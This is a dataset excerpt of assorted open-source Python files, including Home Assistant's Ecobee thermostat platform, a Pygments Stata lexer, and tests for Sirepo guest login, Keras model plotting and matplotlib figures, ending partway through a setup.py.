code
stringlengths 1
199k
|
|---|
u"""Test auth.guest
:copyright: Copyright (c) 2019 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
import pytest
def test_happy_path(auth_fc):
fc = auth_fc
from pykern import pkconfig, pkunit, pkio
from pykern.pkunit import pkok, pkre, pkeq
from pykern.pkdebug import pkdp
import re
fc.sr_get('authGuestLogin', {'simulation_type': fc.sr_sim_type})
fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
fc.sr_auth_state(
avatarUrl=None,
displayName='Guest User',
guestIsOnlyMethod=False,
isGuestUser=True,
isLoggedIn=True,
isLoginExpired=False,
method='guest',
needCompleteRegistration=False,
userName=None,
visibleMethods=['email'],
)
def test_timeout(auth_fc):
fc = auth_fc
from pykern import pkconfig, pkunit, pkio
from pykern import pkjson
from pykern.pkdebug import pkdp
from pykern.pkunit import pkok, pkre, pkeq, pkexcept
import re
r = fc.sr_get('authGuestLogin', {'simulation_type': fc.sr_sim_type}, redirect=False)
pkeq(200, r.status_code)
d = pkjson.load_any(r.data)
pkeq(True, d.authState.isLoggedIn)
fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
fc.sr_auth_state(
isGuestUser=True,
isLoggedIn=True,
isLoginExpired=False,
)
fc.sr_get_json('adjustTime', params={'days': '2'})
fc.sr_auth_state(
isGuestUser=True,
isLoggedIn=True,
isLoginExpired=True,
)
with pkexcept('SRException.*guest-expired'):
fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
|
"""This example downloads activity tags for a given floodlight activity."""
import argparse
import sys
from apiclient import sample_tools
from oauth2client import client
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument(
'profile_id', type=int,
help='The ID of the profile to download tags for')
argparser.add_argument(
'activity_id', type=int,
help='The ID of the floodlight activity to download tags for')
def main(argv):
# Authenticate and construct service.
service, flags = sample_tools.init(
argv, 'dfareporting', 'v2.0', __doc__, __file__, parents=[argparser],
scope=['https://www.googleapis.com/auth/dfareporting',
'https://www.googleapis.com/auth/dfatrafficking'])
profile_id = flags.profile_id
activity_id = flags.activity_id
try:
# Construct the request.
request = service.floodlightActivities().generatetag(
profileId=profile_id, floodlightActivityId=activity_id)
# Execute request and print response.
response = request.execute()
print response['floodlightActivityTag']
except client.AccessTokenRefreshError:
print ('The credentials have been revoked or expired, please re-run the '
'application to re-authorize')
if __name__ == '__main__':
main(sys.argv)
|
"""
Platform for Ecobee Thermostats.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/climate.ecobee/
"""
import logging
import voluptuous as vol
from homeassistant.components import ecobee
from homeassistant.components.climate import (
DOMAIN, STATE_COOL, STATE_HEAT, STATE_AUTO, STATE_IDLE, ClimateDevice,
ATTR_TARGET_TEMP_LOW, ATTR_TARGET_TEMP_HIGH, SUPPORT_TARGET_TEMPERATURE,
SUPPORT_AWAY_MODE, SUPPORT_HOLD_MODE, SUPPORT_OPERATION_MODE,
SUPPORT_TARGET_HUMIDITY_LOW, SUPPORT_TARGET_HUMIDITY_HIGH,
SUPPORT_AUX_HEAT, SUPPORT_TARGET_TEMPERATURE_HIGH, SUPPORT_FAN_MODE,
SUPPORT_TARGET_TEMPERATURE_LOW, STATE_OFF)
from homeassistant.const import (
ATTR_ENTITY_ID, STATE_ON, ATTR_TEMPERATURE, TEMP_FAHRENHEIT)
import homeassistant.helpers.config_validation as cv
_CONFIGURING = {}
_LOGGER = logging.getLogger(__name__)
ATTR_FAN_MIN_ON_TIME = 'fan_min_on_time'
ATTR_RESUME_ALL = 'resume_all'
DEFAULT_RESUME_ALL = False
TEMPERATURE_HOLD = 'temp'
VACATION_HOLD = 'vacation'
AWAY_MODE = 'awayMode'
DEPENDENCIES = ['ecobee']
SERVICE_SET_FAN_MIN_ON_TIME = 'ecobee_set_fan_min_on_time'
SERVICE_RESUME_PROGRAM = 'ecobee_resume_program'
SET_FAN_MIN_ON_TIME_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_FAN_MIN_ON_TIME): vol.Coerce(int),
})
RESUME_PROGRAM_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Optional(ATTR_RESUME_ALL, default=DEFAULT_RESUME_ALL): cv.boolean,
})
SUPPORT_FLAGS = (SUPPORT_TARGET_TEMPERATURE | SUPPORT_AWAY_MODE |
SUPPORT_HOLD_MODE | SUPPORT_OPERATION_MODE |
SUPPORT_TARGET_HUMIDITY_LOW | SUPPORT_TARGET_HUMIDITY_HIGH |
SUPPORT_AUX_HEAT | SUPPORT_TARGET_TEMPERATURE_HIGH |
SUPPORT_TARGET_TEMPERATURE_LOW | SUPPORT_FAN_MODE)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Ecobee Thermostat Platform."""
if discovery_info is None:
return
data = ecobee.NETWORK
hold_temp = discovery_info['hold_temp']
_LOGGER.info(
"Loading ecobee thermostat component with hold_temp set to %s",
hold_temp)
devices = [Thermostat(data, index, hold_temp)
for index in range(len(data.ecobee.thermostats))]
add_entities(devices)
def fan_min_on_time_set_service(service):
"""Set the minimum fan on time on the target thermostats."""
entity_id = service.data.get(ATTR_ENTITY_ID)
fan_min_on_time = service.data[ATTR_FAN_MIN_ON_TIME]
if entity_id:
target_thermostats = [device for device in devices
if device.entity_id in entity_id]
else:
target_thermostats = devices
for thermostat in target_thermostats:
thermostat.set_fan_min_on_time(str(fan_min_on_time))
thermostat.schedule_update_ha_state(True)
def resume_program_set_service(service):
"""Resume the program on the target thermostats."""
entity_id = service.data.get(ATTR_ENTITY_ID)
resume_all = service.data.get(ATTR_RESUME_ALL)
if entity_id:
target_thermostats = [device for device in devices
if device.entity_id in entity_id]
else:
target_thermostats = devices
for thermostat in target_thermostats:
thermostat.resume_program(resume_all)
thermostat.schedule_update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_FAN_MIN_ON_TIME, fan_min_on_time_set_service,
schema=SET_FAN_MIN_ON_TIME_SCHEMA)
hass.services.register(
DOMAIN, SERVICE_RESUME_PROGRAM, resume_program_set_service,
schema=RESUME_PROGRAM_SCHEMA)
class Thermostat(ClimateDevice):
"""A thermostat class for Ecobee."""
def __init__(self, data, thermostat_index, hold_temp):
"""Initialize the thermostat."""
self.data = data
self.thermostat_index = thermostat_index
self.thermostat = self.data.ecobee.get_thermostat(
self.thermostat_index)
self._name = self.thermostat['name']
self.hold_temp = hold_temp
self.vacation = None
self._climate_list = self.climate_list
self._operation_list = ['auto', 'auxHeatOnly', 'cool',
'heat', 'off']
self._fan_list = ['auto', 'on']
self.update_without_throttle = False
def update(self):
"""Get the latest state from the thermostat."""
if self.update_without_throttle:
self.data.update(no_throttle=True)
self.update_without_throttle = False
else:
self.data.update()
self.thermostat = self.data.ecobee.get_thermostat(
self.thermostat_index)
@property
def supported_features(self):
"""Return the list of supported features."""
return SUPPORT_FLAGS
@property
def name(self):
"""Return the name of the Ecobee Thermostat."""
return self.thermostat['name']
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_FAHRENHEIT
@property
def current_temperature(self):
"""Return the current temperature."""
return self.thermostat['runtime']['actualTemperature'] / 10.0
@property
def target_temperature_low(self):
"""Return the lower bound temperature we try to reach."""
if self.current_operation == STATE_AUTO:
return self.thermostat['runtime']['desiredHeat'] / 10.0
return None
@property
def target_temperature_high(self):
"""Return the upper bound temperature we try to reach."""
if self.current_operation == STATE_AUTO:
return self.thermostat['runtime']['desiredCool'] / 10.0
return None
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self.current_operation == STATE_AUTO:
return None
if self.current_operation == STATE_HEAT:
return self.thermostat['runtime']['desiredHeat'] / 10.0
if self.current_operation == STATE_COOL:
return self.thermostat['runtime']['desiredCool'] / 10.0
return None
@property
def fan(self):
"""Return the current fan status."""
if 'fan' in self.thermostat['equipmentStatus']:
return STATE_ON
return STATE_OFF
@property
def current_fan_mode(self):
"""Return the fan setting."""
return self.thermostat['runtime']['desiredFanMode']
@property
def current_hold_mode(self):
"""Return current hold mode."""
mode = self._current_hold_mode
return None if mode == AWAY_MODE else mode
@property
def fan_list(self):
"""Return the available fan modes."""
return self._fan_list
@property
def _current_hold_mode(self):
events = self.thermostat['events']
for event in events:
if event['running']:
if event['type'] == 'hold':
if event['holdClimateRef'] == 'away':
if int(event['endDate'][0:4]) - \
int(event['startDate'][0:4]) <= 1:
# A temporary hold from away climate is a hold
return 'away'
# A permanent hold from away climate
return AWAY_MODE
if event['holdClimateRef'] != "":
# Any other hold based on climate
return event['holdClimateRef']
# Any hold not based on a climate is a temp hold
return TEMPERATURE_HOLD
if event['type'].startswith('auto'):
# All auto modes are treated as holds
return event['type'][4:].lower()
if event['type'] == 'vacation':
self.vacation = event['name']
return VACATION_HOLD
return None
@property
def current_operation(self):
"""Return current operation."""
if self.operation_mode == 'auxHeatOnly' or \
self.operation_mode == 'heatPump':
return STATE_HEAT
return self.operation_mode
@property
def operation_list(self):
"""Return the operation modes list."""
return self._operation_list
@property
def operation_mode(self):
"""Return current operation ie. heat, cool, idle."""
return self.thermostat['settings']['hvacMode']
@property
def mode(self):
"""Return current mode, as the user-visible name."""
cur = self.thermostat['program']['currentClimateRef']
climates = self.thermostat['program']['climates']
current = list(filter(lambda x: x['climateRef'] == cur, climates))
return current[0]['name']
@property
def fan_min_on_time(self):
"""Return current fan minimum on time."""
return self.thermostat['settings']['fanMinOnTime']
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
# Move these to Thermostat Device and make them global
status = self.thermostat['equipmentStatus']
operation = None
if status == '':
operation = STATE_IDLE
elif 'Cool' in status:
operation = STATE_COOL
elif 'auxHeat' in status:
operation = STATE_HEAT
elif 'heatPump' in status:
operation = STATE_HEAT
else:
operation = status
return {
"actual_humidity": self.thermostat['runtime']['actualHumidity'],
"fan": self.fan,
"climate_mode": self.mode,
"operation": operation,
"climate_list": self.climate_list,
"fan_min_on_time": self.fan_min_on_time
}
@property
def is_away_mode_on(self):
"""Return true if away mode is on."""
return self._current_hold_mode == AWAY_MODE
@property
def is_aux_heat_on(self):
"""Return true if aux heater."""
return 'auxHeat' in self.thermostat['equipmentStatus']
def turn_away_mode_on(self):
"""Turn away mode on by setting it on away hold indefinitely."""
if self._current_hold_mode != AWAY_MODE:
self.data.ecobee.set_climate_hold(self.thermostat_index, 'away',
'indefinite')
self.update_without_throttle = True
def turn_away_mode_off(self):
"""Turn away off."""
if self._current_hold_mode == AWAY_MODE:
self.data.ecobee.resume_program(self.thermostat_index)
self.update_without_throttle = True
def set_hold_mode(self, hold_mode):
"""Set hold mode (away, home, temp, sleep, etc.)."""
hold = self.current_hold_mode
if hold == hold_mode:
# no change, so no action required
return
if hold_mode == 'None' or hold_mode is None:
if hold == VACATION_HOLD:
self.data.ecobee.delete_vacation(
self.thermostat_index, self.vacation)
else:
self.data.ecobee.resume_program(self.thermostat_index)
else:
if hold_mode == TEMPERATURE_HOLD:
self.set_temp_hold(self.current_temperature)
else:
self.data.ecobee.set_climate_hold(
self.thermostat_index, hold_mode, self.hold_preference())
self.update_without_throttle = True
def set_auto_temp_hold(self, heat_temp, cool_temp):
"""Set temperature hold in auto mode."""
if cool_temp is not None:
cool_temp_setpoint = cool_temp
else:
cool_temp_setpoint = (
self.thermostat['runtime']['desiredCool'] / 10.0)
if heat_temp is not None:
heat_temp_setpoint = heat_temp
else:
heat_temp_setpoint = (
self.thermostat['runtime']['desiredCool'] / 10.0)
self.data.ecobee.set_hold_temp(self.thermostat_index,
cool_temp_setpoint, heat_temp_setpoint,
self.hold_preference())
_LOGGER.debug("Setting ecobee hold_temp to: heat=%s, is=%s, "
"cool=%s, is=%s", heat_temp,
isinstance(heat_temp, (int, float)), cool_temp,
isinstance(cool_temp, (int, float)))
self.update_without_throttle = True
def set_fan_mode(self, fan_mode):
"""Set the fan mode. Valid values are "on" or "auto"."""
if (fan_mode.lower() != STATE_ON) and (fan_mode.lower() != STATE_AUTO):
error = "Invalid fan_mode value: Valid values are 'on' or 'auto'"
_LOGGER.error(error)
return
cool_temp = self.thermostat['runtime']['desiredCool'] / 10.0
heat_temp = self.thermostat['runtime']['desiredHeat'] / 10.0
self.data.ecobee.set_fan_mode(self.thermostat_index, fan_mode,
cool_temp, heat_temp,
self.hold_preference())
_LOGGER.info("Setting fan mode to: %s", fan_mode)
def set_temp_hold(self, temp):
"""Set temperature hold in modes other than auto.
Ecobee API: It is good practice to set the heat and cool hold
temperatures to be the same, if the thermostat is in either heat, cool,
auxHeatOnly, or off mode. If the thermostat is in auto mode, an
additional rule is required. The cool hold temperature must be greater
than the heat hold temperature by at least the amount in the
heatCoolMinDelta property.
https://www.ecobee.com/home/developer/api/examples/ex5.shtml
"""
if self.current_operation == STATE_HEAT or self.current_operation == \
STATE_COOL:
heat_temp = temp
cool_temp = temp
else:
delta = self.thermostat['settings']['heatCoolMinDelta'] / 10
heat_temp = temp - delta
cool_temp = temp + delta
self.set_auto_temp_hold(heat_temp, cool_temp)
def set_temperature(self, **kwargs):
"""Set new target temperature."""
low_temp = kwargs.get(ATTR_TARGET_TEMP_LOW)
high_temp = kwargs.get(ATTR_TARGET_TEMP_HIGH)
temp = kwargs.get(ATTR_TEMPERATURE)
if self.current_operation == STATE_AUTO and \
(low_temp is not None or high_temp is not None):
self.set_auto_temp_hold(low_temp, high_temp)
elif temp is not None:
self.set_temp_hold(temp)
else:
_LOGGER.error(
"Missing valid arguments for set_temperature in %s", kwargs)
def set_humidity(self, humidity):
"""Set the humidity level."""
self.data.ecobee.set_humidity(self.thermostat_index, humidity)
def set_operation_mode(self, operation_mode):
"""Set HVAC mode (auto, auxHeatOnly, cool, heat, off)."""
self.data.ecobee.set_hvac_mode(self.thermostat_index, operation_mode)
self.update_without_throttle = True
def set_fan_min_on_time(self, fan_min_on_time):
"""Set the minimum fan on time."""
self.data.ecobee.set_fan_min_on_time(
self.thermostat_index, fan_min_on_time)
self.update_without_throttle = True
def resume_program(self, resume_all):
"""Resume the thermostat schedule program."""
self.data.ecobee.resume_program(
self.thermostat_index, 'true' if resume_all else 'false')
self.update_without_throttle = True
def hold_preference(self):
"""Return user preference setting for hold time."""
# Values returned from thermostat are 'useEndTime4hour',
# 'useEndTime2hour', 'nextTransition', 'indefinite', 'askMe'
default = self.thermostat['settings']['holdAction']
if default == 'nextTransition':
return default
# add further conditions if other hold durations should be
# supported; note that this should not include 'indefinite'
# as an indefinite away hold is interpreted as away_mode
return 'nextTransition'
@property
def climate_list(self):
"""Return the list of climates currently available."""
climates = self.thermostat['program']['climates']
return list(map((lambda x: x['name']), climates))
|
"""Tests for Keras Vis utils."""
from tensorflow.python import keras
from tensorflow.python.keras.utils import vis_utils
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class ModelToDotFormatTest(test.TestCase):
def test_plot_model_cnn(self):
model = keras.Sequential()
model.add(
keras.layers.Conv2D(
filters=2, kernel_size=(2, 3), input_shape=(3, 5, 5), name='conv'))
model.add(keras.layers.Flatten(name='flat'))
model.add(keras.layers.Dense(5, name='dense'))
dot_img_file = 'model_1.png'
try:
vis_utils.plot_model(
model, to_file=dot_img_file, show_shapes=True, show_dtype=True)
self.assertTrue(file_io.file_exists_v2(dot_img_file))
file_io.delete_file_v2(dot_img_file)
except ImportError:
pass
def test_plot_model_with_wrapped_layers_and_models(self):
inputs = keras.Input(shape=(None, 3))
lstm = keras.layers.LSTM(6, return_sequences=True, name='lstm')
x = lstm(inputs)
# Add layer inside a Wrapper
bilstm = keras.layers.Bidirectional(
keras.layers.LSTM(16, return_sequences=True, name='bilstm'))
x = bilstm(x)
# Add model inside a Wrapper
submodel = keras.Sequential(
[keras.layers.Dense(32, name='dense', input_shape=(None, 32))]
)
wrapped_dense = keras.layers.TimeDistributed(submodel)
x = wrapped_dense(x)
# Add shared submodel
outputs = submodel(x)
model = keras.Model(inputs, outputs)
dot_img_file = 'model_2.png'
try:
vis_utils.plot_model(
model,
to_file=dot_img_file,
show_shapes=True,
show_dtype=True,
expand_nested=True)
self.assertTrue(file_io.file_exists_v2(dot_img_file))
file_io.delete_file_v2(dot_img_file)
except ImportError:
pass
def test_plot_model_with_add_loss(self):
inputs = keras.Input(shape=(None, 3))
outputs = keras.layers.Dense(1)(inputs)
model = keras.Model(inputs, outputs)
model.add_loss(math_ops.reduce_mean(outputs))
dot_img_file = 'model_3.png'
try:
vis_utils.plot_model(
model,
to_file=dot_img_file,
show_shapes=True,
show_dtype=True,
expand_nested=True)
self.assertTrue(file_io.file_exists_v2(dot_img_file))
file_io.delete_file_v2(dot_img_file)
except ImportError:
pass
model = keras.Sequential([
keras.Input(shape=(None, 3)), keras.layers.Dense(1)])
model.add_loss(math_ops.reduce_mean(model.output))
dot_img_file = 'model_4.png'
try:
vis_utils.plot_model(
model,
to_file=dot_img_file,
show_shapes=True,
show_dtype=True,
expand_nested=True)
self.assertTrue(file_io.file_exists_v2(dot_img_file))
file_io.delete_file_v2(dot_img_file)
except ImportError:
pass
if __name__ == '__main__':
test.main()
|
"""
pygments.lexers.stata
~~~~~~~~~~~~~~~~~~~~~
Lexer for Stata
:copyright: Copyright 2006-2021 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, default, include, words
from pygments.token import Comment, Keyword, Name, Number, \
String, Text, Operator
from pygments.lexers._stata_builtins import builtins_base, builtins_functions
__all__ = ['StataLexer']
class StataLexer(RegexLexer):
"""
For `Stata <http://www.stata.com/>`_ do files.
.. versionadded:: 2.2
"""
# Syntax based on
# - http://fmwww.bc.edu/RePEc/bocode/s/synlightlist.ado
# - https://github.com/isagalaev/highlight.js/blob/master/src/languages/stata.js
# - https://github.com/jpitblado/vim-stata/blob/master/syntax/stata.vim
name = 'Stata'
aliases = ['stata', 'do']
filenames = ['*.do', '*.ado']
mimetypes = ['text/x-stata', 'text/stata', 'application/x-stata']
flags = re.MULTILINE | re.DOTALL
tokens = {
'root': [
include('comments'),
include('strings'),
include('macros'),
include('numbers'),
include('keywords'),
include('operators'),
include('format'),
(r'.', Text),
],
# Comments are a complicated beast in Stata because they can be
# nested and there are a few corner cases with that. See:
# - github.com/kylebarron/language-stata/issues/90
# - statalist.org/forums/forum/general-stata-discussion/general/1448244
'comments': [
(r'(^//|(?<=\s)//)(?!/)', Comment.Single, 'comments-double-slash'),
(r'^\s*\*', Comment.Single, 'comments-star'),
(r'/\*', Comment.Multiline, 'comments-block'),
(r'(^///|(?<=\s)///)', Comment.Special, 'comments-triple-slash')
],
'comments-block': [
(r'/\*', Comment.Multiline, '#push'),
# this ends and restarts a comment block. but need to catch this so
# that it doesn\'t start _another_ level of comment blocks
(r'\*/\*', Comment.Multiline),
(r'(\*/\s+\*(?!/)[^\n]*)|(\*/)', Comment.Multiline, '#pop'),
# Match anything else as a character inside the comment
(r'.', Comment.Multiline),
],
'comments-star': [
(r'///.*?\n', Comment.Single,
('#pop', 'comments-triple-slash')),
(r'(^//|(?<=\s)//)(?!/)', Comment.Single,
('#pop', 'comments-double-slash')),
(r'/\*', Comment.Multiline, 'comments-block'),
(r'.(?=\n)', Comment.Single, '#pop'),
(r'.', Comment.Single),
],
'comments-triple-slash': [
(r'\n', Comment.Special, '#pop'),
# A // breaks out of a comment for the rest of the line
(r'//.*?(?=\n)', Comment.Single, '#pop'),
(r'.', Comment.Special),
],
'comments-double-slash': [
(r'\n', Text, '#pop'),
(r'.', Comment.Single),
],
# `"compound string"' and regular "string"; note the former are
# nested.
'strings': [
(r'`"', String, 'string-compound'),
(r'(?<!`)"', String, 'string-regular'),
],
'string-compound': [
(r'`"', String, '#push'),
(r'"\'', String, '#pop'),
(r'\\\\|\\"|\\\$|\\`|\\\n', String.Escape),
include('macros'),
(r'.', String)
],
'string-regular': [
(r'(")(?!\')|(?=\n)', String, '#pop'),
(r'\\\\|\\"|\\\$|\\`|\\\n', String.Escape),
include('macros'),
(r'.', String)
],
# A local is usually
# `\w{0,31}'
# `:extended macro'
# `=expression'
# `[rsen](results)'
# `(++--)scalar(++--)'
#
# However, there are all sorts of weird rules wrt edge
# cases. Instead of writing 27 exceptions, anything inside
# `' is a local.
#
# A global is more restricted, so we do follow rules. Note only
# locals explicitly enclosed ${} can be nested.
'macros': [
(r'\$(\{|(?=[$`]))', Name.Variable.Global, 'macro-global-nested'),
(r'\$', Name.Variable.Global, 'macro-global-name'),
(r'`', Name.Variable, 'macro-local'),
],
'macro-local': [
(r'`', Name.Variable, '#push'),
(r"'", Name.Variable, '#pop'),
(r'\$(\{|(?=[$`]))', Name.Variable.Global, 'macro-global-nested'),
(r'\$', Name.Variable.Global, 'macro-global-name'),
(r'.', Name.Variable), # fallback
],
'macro-global-nested': [
(r'\$(\{|(?=[$`]))', Name.Variable.Global, '#push'),
(r'\}', Name.Variable.Global, '#pop'),
(r'\$', Name.Variable.Global, 'macro-global-name'),
(r'`', Name.Variable, 'macro-local'),
(r'\w', Name.Variable.Global), # fallback
default('#pop'),
],
'macro-global-name': [
(r'\$(\{|(?=[$`]))', Name.Variable.Global, 'macro-global-nested', '#pop'),
(r'\$', Name.Variable.Global, 'macro-global-name', '#pop'),
(r'`', Name.Variable, 'macro-local', '#pop'),
(r'\w{1,32}', Name.Variable.Global, '#pop'),
],
# Built in functions and statements
'keywords': [
(words(builtins_functions, prefix = r'\b', suffix = r'(?=\()'),
Name.Function),
(words(builtins_base, prefix = r'(^\s*|\s)', suffix = r'\b'),
Keyword),
],
# http://www.stata.com/help.cgi?operators
'operators': [
(r'-|==|<=|>=|<|>|&|!=', Operator),
(r'\*|\+|\^|/|!|~|==|~=', Operator)
],
# Stata numbers
'numbers': [
# decimal number
(r'\b[+-]?([0-9]+(\.[0-9]+)?|\.[0-9]+|\.)([eE][+-]?[0-9]+)?[i]?\b',
Number),
],
# Stata formats
'format': [
(r'%-?\d{1,2}(\.\d{1,2})?[gfe]c?', Name.Other),
(r'%(21x|16H|16L|8H|8L)', Name.Other),
(r'%-?(tc|tC|td|tw|tm|tq|th|ty|tg)\S{0,32}', Name.Other),
(r'%[-~]?\d{1,4}s', Name.Other),
]
}
|
from oslo_log import log as logging
from heat_integrationtests.common import test
LOG = logging.getLogger(__name__)
class CeilometerAlarmTest(test.HeatIntegrationTest):
"""Class is responsible for testing of ceilometer usage."""
def setUp(self):
super(CeilometerAlarmTest, self).setUp()
self.client = self.orchestration_client
self.template = self._load_template(__file__,
'test_ceilometer_alarm.yaml',
'templates')
def check_instance_count(self, stack_identifier, expected):
stack = self.client.stacks.get(stack_identifier)
actual = self._stack_output(stack, 'asg_size')
if actual != expected:
LOG.warn('check_instance_count exp:%d, act:%s' % (expected,
actual))
return actual == expected
def test_alarm(self):
"""Confirm we can create an alarm and trigger it."""
# 1. create the stack
stack_identifier = self.stack_create(template=self.template)
# 2. send ceilometer a metric (should cause the alarm to fire)
sample = {}
sample['counter_type'] = 'gauge'
sample['counter_name'] = 'test_meter'
sample['counter_volume'] = 1
sample['counter_unit'] = 'count'
sample['resource_metadata'] = {'metering.stack_id':
stack_identifier.split('/')[-1]}
sample['resource_id'] = 'shouldnt_matter'
self.metering_client.samples.create(**sample)
# 3. confirm we get a scaleup.
# Note: there is little point waiting more than 60s+time to scale up.
self.assertTrue(test.call_until_true(
120, 2, self.check_instance_count, stack_identifier, 2))
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
from six.moves import xrange
from nose.tools import assert_equal, assert_true
from matplotlib.testing.decorators import image_comparison, cleanup
from matplotlib.axes import Axes
import matplotlib.pyplot as plt
import numpy as np
@cleanup
def test_figure_label():
# pyplot figure creation, selection and closing with figure label and
# number
plt.close('all')
plt.figure('today')
plt.figure(3)
plt.figure('tomorrow')
plt.figure()
plt.figure(0)
plt.figure(1)
plt.figure(3)
assert_equal(plt.get_fignums(), [0, 1, 3, 4, 5])
assert_equal(plt.get_figlabels(), ['', 'today', '', 'tomorrow', ''])
plt.close(10)
plt.close()
plt.close(5)
plt.close('tomorrow')
assert_equal(plt.get_fignums(), [0, 1])
assert_equal(plt.get_figlabels(), ['', 'today'])
@cleanup
def test_fignum_exists():
# pyplot figure creation, selection and closing with fignum_exists
plt.figure('one')
plt.figure(2)
plt.figure('three')
plt.figure()
assert_equal(plt.fignum_exists('one'), True)
assert_equal(plt.fignum_exists(2), True)
assert_equal(plt.fignum_exists('three'), True)
assert_equal(plt.fignum_exists(4), True)
plt.close('one')
plt.close(4)
assert_equal(plt.fignum_exists('one'), False)
assert_equal(plt.fignum_exists(4), False)
@image_comparison(baseline_images=['figure_today'])
def test_figure():
# named figure support
fig = plt.figure('today')
ax = fig.add_subplot(111)
ax.set_title(fig.get_label())
ax.plot(list(xrange(5)))
# plot red line in a different figure.
plt.figure('tomorrow')
plt.plot([0, 1], [1, 0], 'r')
# Return to the original; make sure the red line is not there.
plt.figure('today')
plt.close('tomorrow')
@cleanup
def test_gca():
fig = plt.figure()
ax1 = fig.add_axes([0, 0, 1, 1])
assert_true(fig.gca(projection='rectilinear') is ax1)
assert_true(fig.gca() is ax1)
ax2 = fig.add_subplot(121, projection='polar')
assert_true(fig.gca() is ax2)
assert_true(fig.gca(polar=True)is ax2)
ax3 = fig.add_subplot(122)
assert_true(fig.gca() is ax3)
# the final request for a polar axes will end up creating one
# with a spec of 111.
assert_true(fig.gca(polar=True) is not ax3)
assert_true(fig.gca(polar=True) is not ax2)
assert_equal(fig.gca().get_geometry(), (1, 1, 1))
fig.sca(ax1)
assert_true(fig.gca(projection='rectilinear') is ax1)
assert_true(fig.gca() is ax1)
@image_comparison(baseline_images=['figure_suptitle'])
def test_suptitle():
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
fig.suptitle('hello', color='r')
fig.suptitle('title', color='g', rotation='30')
@cleanup
def test_suptitle_fontproperties():
from matplotlib.font_manager import FontProperties
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
fps = FontProperties(size='large', weight='bold')
txt = fig.suptitle('fontprops title', fontproperties=fps)
assert_equal(txt.get_fontsize(), fps.get_size_in_points())
assert_equal(txt.get_weight(), fps.get_weight())
@image_comparison(baseline_images=['alpha_background'],
# only test png and svg. The PDF output appears correct,
# but Ghostscript does not preserve the background color.
extensions=['png', 'svg'],
savefig_kwarg={'facecolor': (0, 1, 0.4),
'edgecolor': 'none'})
def test_alpha():
# We want an image which has a background color and an
# alpha of 0.4.
fig = plt.figure(figsize=[2, 1])
fig.set_facecolor((0, 1, 0.4))
fig.patch.set_alpha(0.4)
import matplotlib.patches as mpatches
fig.patches.append(mpatches.CirclePolygon([20, 20],
radius=15,
alpha=0.6,
facecolor='red'))
@cleanup
def test_too_many_figures():
import warnings
with warnings.catch_warnings(record=True) as w:
for i in range(22):
fig = plt.figure()
assert len(w) == 1
def test_iterability_axes_argument():
# This is a regression test for matplotlib/matplotlib#3196. If one of the
# arguments returned by _as_mpl_axes defines __getitem__ but is not
# iterable, this would raise an execption. This is because we check
# whether the arguments are iterable, and if so we try and convert them
# to a tuple. However, the ``iterable`` function returns True if
# __getitem__ is present, but some classes can define __getitem__ without
# being iterable. The tuple conversion is now done in a try...except in
# case it fails.
class MyAxes(Axes):
def __init__(self, *args, **kwargs):
kwargs.pop('myclass', None)
return Axes.__init__(self, *args, **kwargs)
class MyClass(object):
def __getitem__(self, item):
if item != 'a':
raise ValueError("item should be a")
def _as_mpl_axes(self):
return MyAxes, {'myclass': self}
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1, projection=MyClass())
plt.close(fig)
@cleanup
def test_set_fig_size():
fig = plt.figure()
# check figwidth
fig.set_figwidth(5)
assert_equal(fig.get_figwidth(), 5)
# check figheight
fig.set_figheight(1)
assert_equal(fig.get_figheight(), 1)
# check using set_size_inches
fig.set_size_inches(2, 4)
assert_equal(fig.get_figwidth(), 2)
assert_equal(fig.get_figheight(), 4)
# check using tuple to first argument
fig.set_size_inches((1, 3))
assert_equal(fig.get_figwidth(), 1)
assert_equal(fig.get_figheight(), 3)
@cleanup
def test_axes_remove():
fig, axes = plt.subplots(2, 2)
axes[-1, -1].remove()
for ax in axes.ravel()[:-1]:
assert ax in fig.axes
assert axes[-1, -1] not in fig.axes
assert_equal(len(fig.axes), 3)
def test_figaspect():
w, h = plt.figaspect(np.float64(2) / np.float64(1))
assert h / w == 2
w, h = plt.figaspect(2)
assert h / w == 2
w, h = plt.figaspect(np.zeros((1, 2)))
assert h / w == 0.5
w, h = plt.figaspect(np.zeros((2, 2)))
assert h / w == 1
if __name__ == "__main__":
import nose
nose.runmodule(argv=['-s', '--with-doctest'], exit=False)
|
import io
import os
import sys
from setuptools import setup
from setuptools import find_packages
with io.open('README.md', 'rt', encoding='utf8') as f:
README = f.read()
if sys.argv[-1] == 'test':
os.system('python -sm unittest discover tests "*_test.py"')
sys.exit(0)
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist')
os.system('twine upload dist/*')
sys.exit(0)
VERSION = '0.0.7'
REQUIRES = ['google-api-python-client>=1.5.3', 'pandas>=0.22.0', 'fire>=0.1.3']
GITHUB_URL = 'https://github.com/condad/google-objects'
setup(
name='google_objects',
packages=find_packages(),
version=VERSION,
description="A simple OO wrapper around Google's python API client",
long_description=README,
long_description_content_type='text/markdown',
author='Connor Sullivan',
author_email='sully4792@gmail.com',
install_requires=REQUIRES,
url=GITHUB_URL,
download_url='https://github.com/condad/google-objects/tarball/' + VERSION,
keywords=['google api', 'google sheets', 'google drive', 'google slides'],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
